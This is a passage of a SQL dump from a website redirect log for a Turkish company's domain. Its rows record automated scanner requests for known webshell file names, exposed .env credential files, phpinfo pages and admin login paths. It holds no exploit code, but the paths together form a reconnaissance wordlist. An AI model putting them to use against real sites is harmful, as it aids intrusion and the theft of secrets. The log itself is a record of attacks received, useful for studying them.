18:22:39','0000-00-00 00:00:00',301),(60579,'http://www.3s-technologies.com.tr/tr/wp-admin/css/wp-conflg.php',NULL,'','',1,0,'2026-04-03 18:22:41','0000-00-00 00:00:00',301),(60580,'http://www.3s-technologies.com.tr/tr/css/chosen.php',NULL,'','',5,0,'2026-04-03 18:22:43','0000-00-00 00:00:00',301),(60581,'http://www.3s-technologies.com.tr/tr/wp-includes/requests/utility/cc.php',NULL,'','',1,0,'2026-04-03 18:22:43','0000-00-00 00:00:00',301),(60582,'http://www.3s-technologies.com.tr/tr/wp-includes/text/index.php',NULL,'','',2,0,'2026-04-03 18:22:44','0000-00-00 00:00:00',301),(60583,'http://www.3s-technologies.com.tr/tr/wp-admin/update.php',NULL,'','',1,0,'2026-04-03 18:22:46','0000-00-00 00:00:00',301),(60584,'http://www.3s-technologies.com.tr/tr/wp-content/themes/astra/inc/fm.php',NULL,'','',1,0,'2026-04-03 18:22:46','0000-00-00 00:00:00',301),(60585,'http://www.3s-technologies.com.tr/tr/wp-content/mu-plugins/gecko.php',NULL,'','',1,0,'2026-04-03 18:22:47','0000-00-00 00:00:00',301),(60586,'http://www.3s-technologies.com.tr/tr/footer.php',NULL,'','',2,0,'2026-04-03 18:22:48','0000-00-00 00:00:00',301),(60587,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/admin.php',NULL,'','',1,0,'2026-04-03 18:23:02','0000-00-00 00:00:00',301),(60588,'http://www.3s-technologies.com.tr/tr/wp-includes/index.php',NULL,'','',1,0,'2026-04-03 18:23:04','0000-00-00 00:00:00',301),(60589,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/install.php',NULL,'','',1,0,'2026-04-03 18:23:05','0000-00-00 00:00:00',301),(60590,'http://www.3s-technologies.com.tr/tr/wp-admin/index.php',NULL,'','',1,0,'2026-04-03 18:23:07','0000-00-00 00:00:00',301),(60591,'http://www.3s-technologies.com.tr/tr/wp-includes/html-api/about.php',NULL,'','',1,0,'2026-04-03 18:23:12','0000-00-00 00:00:00',301),(60592,'http://www.3s-technologies.com.tr/tr/wp-includes/images/smilies/about.php',NULL,'','',1,0,'2026-04-03 18:23:14','0000-00-00 00:00:00',301),(60593,'http://www.3s-technologies.com.tr/tr/images/lmfi2.php',NULL,'','',2,0,'2026-04-03 18:23:14','0000-00-00 00:00:00',301),(60594,'http://www.3s-technologies.com.tr/tr/wp-admin/function.php',NULL,'','',2,0,'2026-04-03 18:23:15','0000-00-00 00:00:00',301),(60595,'http://www.3s-technologies.com.tr/tr/wp-includes/text/diff/alfa-rex.php',NULL,'','',2,0,'2026-04-03 18:23:16','0000-00-00 00:00:00',301),(60596,'http://www.3s-technologies.com.tr/tr/images/chosen.php',NULL,'','',2,0,'2026-04-03 18:23:17','0000-00-00 00:00:00',301),(60597,'http://www.3s-technologies.com.tr/tr/class-wp-html-active-formatting-elements.php',NULL,'','',1,0,'2026-04-03 18:23:22','0000-00-00 00:00:00',301),(60598,'http://www.3s-technologies.com.tr/tr/class-wp-html-attribute-token.php',NULL,'','',1,0,'2026-04-03 18:23:23','0000-00-00 00:00:00',301),(60599,'http://www.3s-technologies.com.tr/tr/class-wp-html-decoder.php',NULL,'','',1,0,'2026-04-03 18:23:23','0000-00-00 00:00:00',301),(60600,'http://www.3s-technologies.com.tr/tr/class-wp-html-doctype-info.php',NULL,'','',1,0,'2026-04-03 18:23:24','0000-00-00 00:00:00',301),(60601,'http://www.3s-technologies.com.tr/tr/class-wp-html-open-elements.php',NULL,'','',1,0,'2026-04-03 18:23:25','0000-00-00 00:00:00',301),(60602,'http://www.3s-technologies.com.tr/tr/class-wp-html-processor-state.php',NULL,'','',1,0,'2026-04-03 18:23:25','0000-00-00 00:00:00',301),(60603,'http://www.3s-technologies.com.tr/tr/class-wp-html-processor.php',NULL,'','',1,0,'2026-04-03 18:23:26','0000-00-00 00:00:00',301),(60604,'http://www.3s-technologies.com.tr/tr/class-wp-html-span.php',NULL,'','',1,0,'2026-04-03 18:23:27','0000-00-00 00:00:00',301),(60605,'http://www.3s-technologies.com.tr/tr/class-wp-html-stack-event.php',NULL,'','',1,0,'2026-04-03 18:23:27','0000-00-00 00:00:00',301),(60606,'http://www.3s-technologies.com.tr/tr/class-wp-html-tag-processor.php',NULL,'','',1,0,'2026-04-03 18:23:28','0000-00-00 00:00:00',301),(60607,'http://www.3s-technologies.com.tr/tr/class-wp-html-text-replacement.php',NULL,'','',1,0,'2026-04-03 18:23:29','0000-00-00 00:00:00',301),(60608,'http://www.3s-technologies.com.tr/tr/class-wp-html-token.php',NULL,'','',1,0,'2026-04-03 18:23:29','0000-00-00 00:00:00',301),(60609,'http://www.3s-technologies.com.tr/tr/class-wp-html-unsupported-exception.php',NULL,'','',1,0,'2026-04-03 18:23:30','0000-00-00 00:00:00',301),(60610,'http://www.3s-technologies.com.tr/tr/config-backup.php',NULL,'','',3,0,'2026-04-03 18:23:31','0000-00-00 00:00:00',301),(60611,'http://www.3s-technologies.com.tr/tr/html5-named-character-references.php',NULL,'','',1,0,'2026-04-03 18:23:32','0000-00-00 00:00:00',301),(60612,'http://mail.3s-technologies.com.tr/tr/class-wp-html-active-formatting-elements.php',NULL,'','',5,0,'2026-04-03 19:30:33','0000-00-00 00:00:00',301),(60613,'http://mail.3s-technologies.com.tr/tr/class-wp-html-attribute-token.php',NULL,'','',5,0,'2026-04-03 19:30:34','0000-00-00 00:00:00',301),(60614,'http://mail.3s-technologies.com.tr/tr/class-wp-html-decoder.php',NULL,'','',5,0,'2026-04-03 19:30:35','0000-00-00 00:00:00',301),(60615,'http://mail.3s-technologies.com.tr/tr/class-wp-html-doctype-info.php',NULL,'','',5,0,'2026-04-03 19:30:36','0000-00-00 00:00:00',301),(60616,'http://mail.3s-technologies.com.tr/tr/class-wp-html-open-elements.php',NULL,'','',5,0,'2026-04-03 19:30:37','0000-00-00 00:00:00',301),(60617,'http://mail.3s-technologies.com.tr/tr/class-wp-html-processor-state.php',NULL,'','',5,0,'2026-04-03 19:30:38','0000-00-00 00:00:00',301),(60618,'http://mail.3s-technologies.com.tr/tr/class-wp-html-processor.php',NULL,'','',5,0,'2026-04-03 19:30:39','0000-00-00 00:00:00',301),(60619,'http://mail.3s-technologies.com.tr/tr/class-wp-html-span.php',NULL,'','',5,0,'2026-04-03 19:30:40','0000-00-00 00:00:00',301),(60620,'http://mail.3s-technologies.com.tr/tr/class-wp-html-stack-event.php',NULL,'','',5,0,'2026-04-03 19:30:41','0000-00-00 00:00:00',301),(60621,'http://mail.3s-technologies.com.tr/tr/class-wp-html-tag-processor.php',NULL,'','',5,0,'2026-04-03 19:30:43','0000-00-00 00:00:00',301),(60622,'http://mail.3s-technologies.com.tr/tr/class-wp-html-text-replacement.php',NULL,'','',5,0,'2026-04-03 19:30:44','0000-00-00 00:00:00',301),(60623,'http://mail.3s-technologies.com.tr/tr/class-wp-html-token.php',NULL,'','',5,0,'2026-04-03 19:30:45','0000-00-00 00:00:00',301),(60624,'http://mail.3s-technologies.com.tr/tr/class-wp-html-unsupported-exception.php',NULL,'','',5,0,'2026-04-03 19:30:47','0000-00-00 00:00:00',301),(60625,'http://mail.3s-technologies.com.tr/tr/config-backup.php',NULL,'','',8,0,'2026-04-03 19:30:48','0000-00-00 00:00:00',301),(60626,'http://mail.3s-technologies.com.tr/tr/html5-named-character-references.php',NULL,'','',5,0,'2026-04-03 19:30:50','0000-00-00 00:00:00',301),(60627,'http://3s-technologies.com.tr/tr/tymi.php',NULL,'','',20,0,'2026-04-03 20:31:34','0000-00-00 00:00:00',301),(60628,'http://3s-technologies.com.tr/tr/cilus.php',NULL,'','',43,0,'2026-04-03 20:31:39','0000-00-00 00:00:00',301),(60629,'http://3s-technologies.com.tr/tr/hla-dd.php',NULL,'','',21,0,'2026-04-03 20:31:40','0000-00-00 00:00:00',301),(60630,'http://3s-technologies.com.tr/tr/wsc.php',NULL,'','',6,0,'2026-04-03 20:31:40','0000-00-00 00:00:00',301),(60631,'http://3s-technologies.com.tr/tr/wp-lvminl.php',NULL,'','',6,0,'2026-04-03 20:31:41','0000-00-00 00:00:00',301),(60632,'http://3s-technologies.com.tr/tr/dczem.php',NULL,'','',4,0,'2026-04-03 20:31:42','0000-00-00 00:00:00',301),(60633,'http://3s-technologies.com.tr/tr/albrt.php',NULL,'','',21,0,'2026-04-03 20:31:42','0000-00-00 00:00:00',301),(60634,'https://3s-technologies.com.tr/en/giris',NULL,'','',4,0,'2026-04-04 10:50:39','0000-00-00 00:00:00',301),(60635,'https://3s-technologies.com.tr/en/kullanici/giris',NULL,'','',2,0,'2026-04-04 10:50:40','0000-00-00 00:00:00',301),(60636,'https://3s-technologies.com.tr/en/yonetim',NULL,'','',2,0,'2026-04-04 10:50:41','0000-00-00 00:00:00',301),(60637,'https://3s-technologies.com.tr/en/login.aspx',NULL,'','',4,0,'2026-04-04 10:50:41','0000-00-00 00:00:00',301),(60638,'https://3s-technologies.com.tr/en/login.php',NULL,'','',2,0,'2026-04-04 10:50:43','0000-00-00 00:00:00',301),(60639,'https://3s-technologies.com.tr/en/login.asp',NULL,'','',2,0,'2026-04-04 10:50:44','0000-00-00 00:00:00',301),(60640,'https://3s-technologies.com.tr/en/signin',NULL,'','',2,0,'2026-04-04 10:50:45','0000-00-00 00:00:00',301),(60641,'https://3s-technologies.com.tr/en/sign-in',NULL,'','',2,0,'2026-04-04 10:50:45','0000-00-00 00:00:00',301),(60642,'https://3s-technologies.com.tr/en/admin/login',NULL,'','',2,0,'2026-04-04 10:50:46','0000-00-00 00:00:00',301),(60643,'https://3s-technologies.com.tr/en/admin/login.php',NULL,'','',2,0,'2026-04-04 10:50:47','0000-00-00 00:00:00',301),(60644,'https://3s-technologies.com.tr/en/admin/index.php',NULL,'','',2,0,'2026-04-04 10:50:48','0000-00-00 00:00:00',301),(60645,'https://3s-technologies.com.tr/en/auth/login',NULL,'','',2,0,'2026-04-04 10:50:48','0000-00-00 00:00:00',301),(60646,'https://3s-technologies.com.tr/en/user/login',NULL,'','',2,0,'2026-04-04 10:50:49','0000-00-00 00:00:00',301),(60647,'https://3s-technologies.com.tr/en/account/login',NULL,'','',2,0,'2026-04-04 10:50:49','0000-00-00 00:00:00',301),(60648,'https://3s-technologies.com.tr/en/portal',NULL,'','',2,0,'2026-04-04 10:50:50','0000-00-00 00:00:00',301),(60649,'https://3s-technologies.com.tr/en/panel',NULL,'','',2,0,'2026-04-04 10:50:51','0000-00-00 00:00:00',301),(60650,'https://3s-technologies.com.tr/en/dashboard/login',NULL,'','',2,0,'2026-04-04 10:50:51','0000-00-00 00:00:00',301),(60651,'https://3s-technologies.com.tr/en/manage',NULL,'','',2,0,'2026-04-04 10:50:52','0000-00-00 00:00:00',301),(60652,'https://3s-technologies.com.tr/en/secure/login',NULL,'','',1,0,'2026-04-04 10:50:52','0000-00-00 00:00:00',301),(60653,'https://3s-technologies.com.tr/en/system/login',NULL,'','',1,0,'2026-04-04 10:50:53','0000-00-00 00:00:00',301),(60654,'https://3s-technologies.com.tr/en/member/login',NULL,'','',2,0,'2026-04-04 10:50:53','0000-00-00 00:00:00',301),(60655,'https://3s-technologies.com.tr/api/login',NULL,'','',12,0,'2026-04-04 10:50:54','0000-00-00 00:00:00',301),(60656,'https://3s-technologies.com.tr/api/auth',NULL,'','',13,0,'2026-04-04 10:50:56','0000-00-00 00:00:00',301),(60657,'https://3s-technologies.com.tr/api/signin',NULL,'','',12,0,'2026-04-04 10:50:58','0000-00-00 00:00:00',301),(60658,'https://3s-technologies.com.tr/api/v1/login',NULL,'','',12,0,'2026-04-04 10:51:00','0000-00-00 00:00:00',301),(60659,'https://3s-technologies.com.tr/api/v1/auth',NULL,'','',12,0,'2026-04-04 10:51:02','0000-00-00 00:00:00',301),(60660,'https://3s-technologies.com.tr/api/v1/signin',NULL,'','',12,0,'2026-04-04 10:51:04','0000-00-00 00:00:00',301),(60661,'https://3s-technologies.com.tr/api/v2/login',NULL,'','',12,0,'2026-04-04 10:51:05','0000-00-00 00:00:00',301),(60662,'https://3s-technologies.com.tr/api/v2/auth',NULL,'','',12,0,'2026-04-04 10:51:07','0000-00-00 00:00:00',301),(60663,'https://3s-technologies.com.tr/api/session',NULL,'','',12,0,'2026-04-04 10:51:09','0000-00-00 00:00:00',301),(60664,'https://3s-technologies.com.tr/api/sessions',NULL,'','',12,0,'2026-04-04 10:51:11','0000-00-00 00:00:00',301),(60665,'https://3s-technologies.com.tr/api/users/login',NULL,'','',12,0,'2026-04-04 10:51:13','0000-00-00 00:00:00',301),(60666,'https://3s-technologies.com.tr/api/users/signin',NULL,'','',12,0,'2026-04-04 10:51:15','0000-00-00 00:00:00',301),(60667,'https://3s-technologies.com.tr/api/authenticate',NULL,'','',12,0,'2026-04-04 10:51:17','0000-00-00 00:00:00',301),(60668,'https://3s-technologies.com.tr/api/token',NULL,'','',12,0,'2026-04-04 10:51:19','0000-00-00 00:00:00',301),(60669,'https://3s-technologies.com.tr/api/user/login',NULL,'','',12,0,'2026-04-04 10:51:21','0000-00-00 00:00:00',301),(60670,'https://3s-technologies.com.tr/auth/login',NULL,'','',12,0,'2026-04-04 10:51:23','0000-00-00 00:00:00',301),(60671,'https://3s-technologies.com.tr/auth/signin',NULL,'','',12,0,'2026-04-04 10:51:25','0000-00-00 00:00:00',301),(60672,'https://3s-technologies.com.tr/auth/token',NULL,'','',12,0,'2026-04-04 10:51:27','0000-00-00 00:00:00',301),(60673,'https://3s-technologies.com.tr/user/login',NULL,'','',12,0,'2026-04-04 10:51:29','0000-00-00 00:00:00',301),(60674,'https://3s-technologies.com.tr/account/login',NULL,'','',12,0,'2026-04-04 10:51:31','0000-00-00 00:00:00',301),(60675,'https://3s-technologies.com.tr/rest/login',NULL,'','',12,0,'2026-04-04 10:51:33','0000-00-00 00:00:00',301),(60676,'https://3s-technologies.com.tr/rest/auth',NULL,'','',12,0,'2026-04-04 10:51:34','0000-00-00 00:00:00',301),(60677,'https://3s-technologies.com.tr/rest/v1/login',NULL,'','',12,0,'2026-04-04 10:51:36','0000-00-00 00:00:00',301),(60678,'https://3s-technologies.com.tr/login/api',NULL,'','',12,0,'2026-04-04 10:51:41','0000-00-00 00:00:00',301),(60679,'https://3s-technologies.com.tr/signin/api',NULL,'','',12,0,'2026-04-04 10:51:42','0000-00-00 00:00:00',301),(60680,'https://3s-technologies.com.tr/ajax/login',NULL,'','',12,0,'2026-04-04 10:51:44','0000-00-00 00:00:00',301),(60681,'https://3s-technologies.com.tr/rpc/login',NULL,'','',12,0,'2026-04-04 10:51:46','0000-00-00 00:00:00',301),(60682,'https://3s-technologies.com.tr/tr/.env.remote',NULL,'','',8,0,'2026-04-04 11:31:57','0000-00-00 00:00:00',301),(60683,'https://3s-technologies.com.tr/tr/lib/.env',NULL,'','',9,0,'2026-04-04 11:32:05','0000-00-00 00:00:00',301),(60684,'https://3s-technologies.com.tr/tr/lab/.env',NULL,'','',8,0,'2026-04-04 11:32:06','0000-00-00 00:00:00',301),(60685,'https://3s-technologies.com.tr/tr/cronlab/.env',NULL,'','',8,0,'2026-04-04 11:32:07','0000-00-00 00:00:00',301),(60686,'https://3s-technologies.com.tr/tr/core/app/.env',NULL,'','',8,0,'2026-04-04 11:32:11','0000-00-00 00:00:00',301),(60687,'https://3s-technologies.com.tr/tr/core/datavase/.env',NULL,'','',2,0,'2026-04-04 11:32:12','0000-00-00 00:00:00',301),(60688,'https://3s-technologies.com.tr/tr/uploads/.env',NULL,'','',8,0,'2026-04-04 11:32:19','0000-00-00 00:00:00',301),(60689,'https://3s-technologies.com.tr/tr/sitemaps/.env',NULL,'','',2,0,'2026-04-04 11:32:20','0000-00-00 00:00:00',301),(60690,'https://3s-technologies.com.tr/tr/saas/.env',NULL,'','',7,0,'2026-04-04 11:32:21','0000-00-00 00:00:00',301),(60691,'https://3s-technologies.com.tr/tr/psnlink/.env',NULL,'','',2,0,'2026-04-04 11:32:23','0000-00-00 00:00:00',301),(60692,'https://3s-technologies.com.tr/tr/exapi/.env',NULL,'','',2,0,'2026-04-04 11:32:24','0000-00-00 00:00:00',301),(60693,'https://3s-technologies.com.tr/tr/site/.env',NULL,'','',9,0,'2026-04-04 11:32:25','0000-00-00 00:00:00',301),(60694,'https://3s-technologies.com.tr/en/tools/.env',NULL,'','',2,0,'2026-04-04 11:32:30','0000-00-00 00:00:00',301),(60695,'https://3s-technologies.com.tr/en/v1/.env',NULL,'','',2,0,'2026-04-04 11:32:32','0000-00-00 00:00:00',301),(60696,'https://3s-technologies.com.tr/en/v2/.env',NULL,'','',2,0,'2026-04-04 11:32:33','0000-00-00 00:00:00',301),(60697,'https://3s-technologies.com.tr/en/administrator/.env',NULL,'','',8,0,'2026-04-04 11:32:34','0000-00-00 00:00:00',301),(60698,'https://3s-technologies.com.tr/en/storage/.env',NULL,'','',2,0,'2026-04-04 11:32:36','0000-00-00 00:00:00',301),(60699,'https://3s-technologies.com.tr/en/backend/.env',NULL,'','',5,0,'2026-04-04 11:32:38','0000-00-00 00:00:00',301),(60700,'https://3s-technologies.com.tr/en/server/.env',NULL,'','',2,0,'2026-04-04 11:32:39','0000-00-00 00:00:00',301),(60701,'https://3s-technologies.com.tr/en/frontend/.env',NULL,'','',2,0,'2026-04-04 11:32:40','0000-00-00 00:00:00',301),(60702,'https://3s-technologies.com.tr/en/current/.env',NULL,'','',2,0,'2026-04-04 11:32:41','0000-00-00 00:00:00',301),(60703,'https://3s-technologies.com.tr/en/dist/.env',NULL,'','',2,0,'2026-04-04 11:32:43','0000-00-00 00:00:00',301),(60704,'https://3s-technologies.com.tr/en/build/.env',NULL,'','',2,0,'2026-04-04 11:32:44','0000-00-00 00:00:00',301),(60705,'https://3s-technologies.com.tr/en/public_html/.env',NULL,'','',2,0,'2026-04-04 11:32:45','0000-00-00 00:00:00',301),(60706,'https://3s-technologies.com.tr/en/live/.env',NULL,'','',2,0,'2026-04-04 11:32:46','0000-00-00 00:00:00',301),(60707,'https://3s-technologies.com.tr/en/dev/.env',NULL,'','',2,0,'2026-04-04 11:32:50','0000-00-00 00:00:00',301),(60708,'https://3s-technologies.com.tr/en/project/.env',NULL,'','',2,0,'2026-04-04 11:32:51','0000-00-00 00:00:00',301),(60709,'https://3s-technologies.com.tr/en/client/.env',NULL,'','',2,0,'2026-04-04 11:32:52','0000-00-00 00:00:00',301),(60710,'https://3s-technologies.com.tr/en/service/.env',NULL,'','',2,0,'2026-04-04 11:32:53','0000-00-00 00:00:00',301),(60711,'https://3s-technologies.com.tr/en/node/.env',NULL,'','',2,0,'2026-04-04 11:32:54','0000-00-00 00:00:00',301),(60712,'https://3s-technologies.com.tr/en/php.php',NULL,'','',6,0,'2026-04-04 11:32:58','0000-00-00 00:00:00',301),(60713,'https://3s-technologies.com.tr/en/pinfo.php',NULL,'','',6,0,'2026-04-04 11:33:00','0000-00-00 00:00:00',301),(60714,'https://3s-technologies.com.tr/en/admin/phpinfo.php',NULL,'','',6,0,'2026-04-04 11:33:02','0000-00-00 00:00:00',301),(60715,'https://3s-technologies.com.tr/en/test/phpinfo.php',NULL,'','',6,0,'2026-04-04 11:33:03','0000-00-00 00:00:00',301),(60716,'https://3s-technologies.com.tr/en/dev/phpinfo.php',NULL,'','',6,0,'2026-04-04 11:33:04','0000-00-00 00:00:00',301),(60717,'https://3s-technologies.com.tr/en/development/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:06','0000-00-00 00:00:00',301),(60718,'https://3s-technologies.com.tr/en/develop/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:07','0000-00-00 00:00:00',301),(60719,'https://3s-technologies.com.tr/en/api/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:08','0000-00-00 00:00:00',301),(60720,'https://3s-technologies.com.tr/en/backend/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:09','0000-00-00 00:00:00',301),(60721,'https://3s-technologies.com.tr/en/server/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:10','0000-00-00 00:00:00',301),(60722,'https://3s-technologies.com.tr/en/current/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:12','0000-00-00 00:00:00',301),(60723,'https://3s-technologies.com.tr/en/services/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:13','0000-00-00 00:00:00',301),(60724,'https://3s-technologies.com.tr/en/service/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:14','0000-00-00 00:00:00',301),(60725,'https://3s-technologies.com.tr/en/laravel/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:15','0000-00-00 00:00:00',301),(60726,'https://3s-technologies.com.tr/en/dashboard/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:16','0000-00-00 00:00:00',301),(60727,'https://3s-technologies.com.tr/en/helper/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:18','0000-00-00 00:00:00',301),(60728,'https://3s-technologies.com.tr/en/xampp/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:19','0000-00-00 00:00:00',301),(60729,'https://3s-technologies.com.tr/en/backup/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:21','0000-00-00 00:00:00',301),(60730,'https://3s-technologies.com.tr/en/old/phpinfo.php',NULL,'','',6,0,'2026-04-04 11:33:22','0000-00-00 00:00:00',301),(60731,'https://3s-technologies.com.tr/en/crm/phpinfo.php',NULL,'','',2,0,'2026-04-04 11:33:23','0000-00-00 00:00:00',301),(60732,'https://3s-technologies.com.tr/en/admin/info.php',NULL,'','',2,0,'2026-04-04 11:33:24','0000-00-00 00:00:00',301),(60733,'https://3s-technologies.com.tr/en/test/info.php',NULL,'','',2,0,'2026-04-04 11:33:26','0000-00-00 00:00:00',301),(60734,'https://3s-technologies.com.tr/en/dev/info.php',NULL,'','',2,0,'2026-04-04 11:33:27','0000-00-00 00:00:00',301),(60735,'https://3s-technologies.com.tr/en/development/info.php',NULL,'','',2,0,'2026-04-04 11:33:28','0000-00-00 00:00:00',301),(60736,'https://3s-technologies.com.tr/en/develop/info.php',NULL,'','',2,0,'2026-04-04 11:33:30','0000-00-00 00:00:00',301),(60737,'https://3s-technologies.com.tr/en/api/info.php',NULL,'','',2,0,'2026-04-04 11:33:31','0000-00-00 00:00:00',301),(60738,'https://3s-technologies.com.tr/en/backend/info.php',NULL,'','',2,0,'2026-04-04 11:33:32','0000-00-00 00:00:00',301),(60739,'https://3s-technologies.com.tr/en/server/info.php',NULL,'','',2,0,'2026-04-04 11:33:33','0000-00-00 00:00:00',301),(60740,'https://3s-technologies.com.tr/en/current/info.php',NULL,'','',2,0,'2026-04-04 11:33:34','0000-00-00 00:00:00',301),(60741,'https://3s-technologies.com.tr/en/services/info.php',NULL,'','',2,0,'2026-04-04 11:33:36','0000-00-00 00:00:00',301),(60742,'https://3s-technologies.com.tr/en/service/info.php',NULL,'','',2,0,'2026-04-04 11:33:37','0000-00-00 00:00:00',301),(60743,'https://3s-technologies.com.tr/en/laravel/info.php',NULL,'','',2,0,'2026-04-04 11:33:38','0000-00-00 00:00:00',301),(60744,'https://3s-technologies.com.tr/en/helper/info.php',NULL,'','',2,0,'2026-04-04 11:33:40','0000-00-00 00:00:00',301),(60745,'https://3s-technologies.com.tr/en/xampp/info.php',NULL,'','',2,0,'2026-04-04 11:33:41','0000-00-00 00:00:00',301),(60746,'https://3s-technologies.com.tr/en/backup/info.php',NULL,'','',2,0,'2026-04-04 11:33:42','0000-00-00 00:00:00',301),(60747,'https://3s-technologies.com.tr/en/old/info.php',NULL,'','',2,0,'2026-04-04 11:33:43','0000-00-00 00:00:00',301),(60748,'https://3s-technologies.com.tr/en/crm/info.php',NULL,'','',2,0,'2026-04-04 11:33:44','0000-00-00 00:00:00',301),(60749,'https://3s-technologies.com.tr/en/php-info.php',NULL,'','',6,0,'2026-04-04 11:33:46','0000-00-00 00:00:00',301),(60750,'https://3s-technologies.com.tr/en/phpversion.php',NULL,'','',6,0,'2026-04-04 11:33:47','0000-00-00 00:00:00',301),(60751,'https://3s-technologies.com.tr/en/old_phpinfo.php',NULL,'','',6,0,'2026-04-04 11:33:48','0000-00-00 00:00:00',301),(60752,'https://3s-technologies.com.tr/en/_environment',NULL,'','',6,0,'2026-04-04 11:33:50','0000-00-00 00:00:00',301),(60753,'https://3s-technologies.com.tr/en/webroot/index.php/_environment',NULL,'','',6,0,'2026-04-04 11:33:51','0000-00-00 00:00:00',301),(60754,'https://3s-technologies.com.tr/en/login.html',NULL,'','',1,0,'2026-04-04 11:47:34','0000-00-00 00:00:00',301),(60755,'https://3s-technologies.com.tr/en/signin.php',NULL,'','',1,0,'2026-04-04 11:47:35','0000-00-00 00:00:00',301),(60756,'https://3s-technologies.com.tr/en/auth/signin',NULL,'','',1,0,'2026-04-04 11:47:37','0000-00-00 00:00:00',301),(60757,'https://3s-technologies.com.tr/en/account/signin',NULL,'','',1,0,'2026-04-04 11:47:39','0000-00-00 00:00:00',301),(60758,'https://3s-technologies.com.tr/en/admin/signin',NULL,'','',1,0,'2026-04-04 11:47:42','0000-00-00 00:00:00',301),(60759,'https://3s-technologies.com.tr/en/admin/auth',NULL,'','',1,0,'2026-04-04 11:47:42','0000-00-00 00:00:00',301),(60760,'https://3s-technologies.com.tr/en/admin/auth/login',NULL,'','',1,0,'2026-04-04 11:47:43','0000-00-00 00:00:00',301),(60761,'https://3s-technologies.com.tr/en/admin/authenticate',NULL,'','',1,0,'2026-04-04 11:47:43','0000-00-00 00:00:00',301),(60762,'https://3s-technologies.com.tr/en/administrator/login',NULL,'','',1,0,'2026-04-04 11:47:44','0000-00-00 00:00:00',301),(60763,'https://3s-technologies.com.tr/en/adminlogin',NULL,'','',1,0,'2026-04-04 11:47:45','0000-00-00 00:00:00',301),(60764,'https://3s-technologies.com.tr/en/adminlogin.php',NULL,'','',1,0,'2026-04-04 11:47:46','0000-00-00 00:00:00',301),(60765,'https://3s-technologies.com.tr/en/admin_login',NULL,'','',1,0,'2026-04-04 11:47:46','0000-00-00 00:00:00',301),(60766,'https://3s-technologies.com.tr/en/admin_login.php',NULL,'','',1,0,'2026-04-04 11:47:47','0000-00-00 00:00:00',301),(60767,'https://3s-technologies.com.tr/en/admin-login',NULL,'','',1,0,'2026-04-04 11:47:47','0000-00-00 00:00:00',301),(60768,'https://3s-technologies.com.tr/en/admin-login.php',NULL,'','',1,0,'2026-04-04 11:47:48','0000-00-00 00:00:00',301),(60769,'https://3s-technologies.com.tr/en/panel/login',NULL,'','',1,0,'2026-04-04 11:47:49','0000-00-00 00:00:00',301),(60770,'https://3s-technologies.com.tr/en/panel/login.php',NULL,'','',1,0,'2026-04-04 11:47:49','0000-00-00 00:00:00',301),(60771,'https://3s-technologies.com.tr/en/panel/auth',NULL,'','',1,0,'2026-04-04 11:47:50','0000-00-00 00:00:00',301),(60772,'https://3s-technologies.com.tr/en/dashboard',NULL,'','',1,0,'2026-04-04 11:47:50','0000-00-00 00:00:00',301),(60773,'https://3s-technologies.com.tr/en/dashboard/auth',NULL,'','',1,0,'2026-04-04 11:47:52','0000-00-00 00:00:00',301),(60774,'https://3s-technologies.com.tr/en/portal/login',NULL,'','',1,0,'2026-04-04 11:47:53','0000-00-00 00:00:00',301),(60775,'https://3s-technologies.com.tr/en/portal/auth',NULL,'','',1,0,'2026-04-04 11:47:53','0000-00-00 00:00:00',301),(60776,'https://3s-technologies.com.tr/en/manage/login',NULL,'','',1,0,'2026-04-04 11:47:55','0000-00-00 00:00:00',301),(60777,'https://3s-technologies.com.tr/en/manage/auth',NULL,'','',1,0,'2026-04-04 11:47:55','0000-00-00 00:00:00',301),(60778,'https://3s-technologies.com.tr/en/backend',NULL,'','',1,0,'2026-04-04 11:47:56','0000-00-00 00:00:00',301),(60779,'https://3s-technologies.com.tr/en/backend/login',NULL,'','',1,0,'2026-04-04 11:47:56','0000-00-00 00:00:00',301),(60780,'https://3s-technologies.com.tr/en/backend/auth',NULL,'','',1,0,'2026-04-04 11:47:57','0000-00-00 00:00:00',301),(60781,'https://3s-technologies.com.tr/en/cms',NULL,'','',1,0,'2026-04-04 11:47:57','0000-00-00 00:00:00',301),(60782,'https://3s-technologies.com.tr/en/cms/login',NULL,'','',1,0,'2026-04-04 11:47:58','0000-00-00 00:00:00',301),(60783,'https://3s-technologies.com.tr/en/cms/admin',NULL,'','',1,0,'2026-04-04 11:47:59','0000-00-00 00:00:00',301),(60784,'https://3s-technologies.com.tr/en/cms/admin/login',NULL,'','',1,0,'2026-04-04 11:47:59','0000-00-00 00:00:00',301),(60785,'https://3s-technologies.com.tr/en/site/login',NULL,'','',1,0,'2026-04-04 11:48:00','0000-00-00 00:00:00',301),(60786,'https://3s-technologies.com.tr/en/site/admin',NULL,'','',1,0,'2026-04-04 11:48:00','0000-00-00 00:00:00',301),(60787,'https://3s-technologies.com.tr/en/app/login',NULL,'','',1,0,'2026-04-04 11:48:01','0000-00-00 00:00:00',301),(60788,'https://3s-technologies.com.tr/en/app/admin',NULL,'','',1,0,'2026-04-04 11:48:01','0000-00-00 00:00:00',301),(60789,'https://3s-technologies.com.tr/en/cp',NULL,'','',1,0,'2026-04-04 11:48:02','0000-00-00 00:00:00',301),(60790,'https://3s-technologies.com.tr/en/cp/login',NULL,'','',1,0,'2026-04-04 11:48:02','0000-00-00 00:00:00',301),(60791,'https://3s-technologies.com.tr/en/cp/login.php',NULL,'','',1,0,'2026-04-04 11:48:03','0000-00-00 00:00:00',301),(60792,'https://3s-technologies.com.tr/en/controlpanel/login',NULL,'','',1,0,'2026-04-04 11:48:03','0000-00-00 00:00:00',301),(60793,'https://3s-technologies.com.tr/en/webadmin/login',NULL,'','',1,0,'2026-04-04 11:48:05','0000-00-00 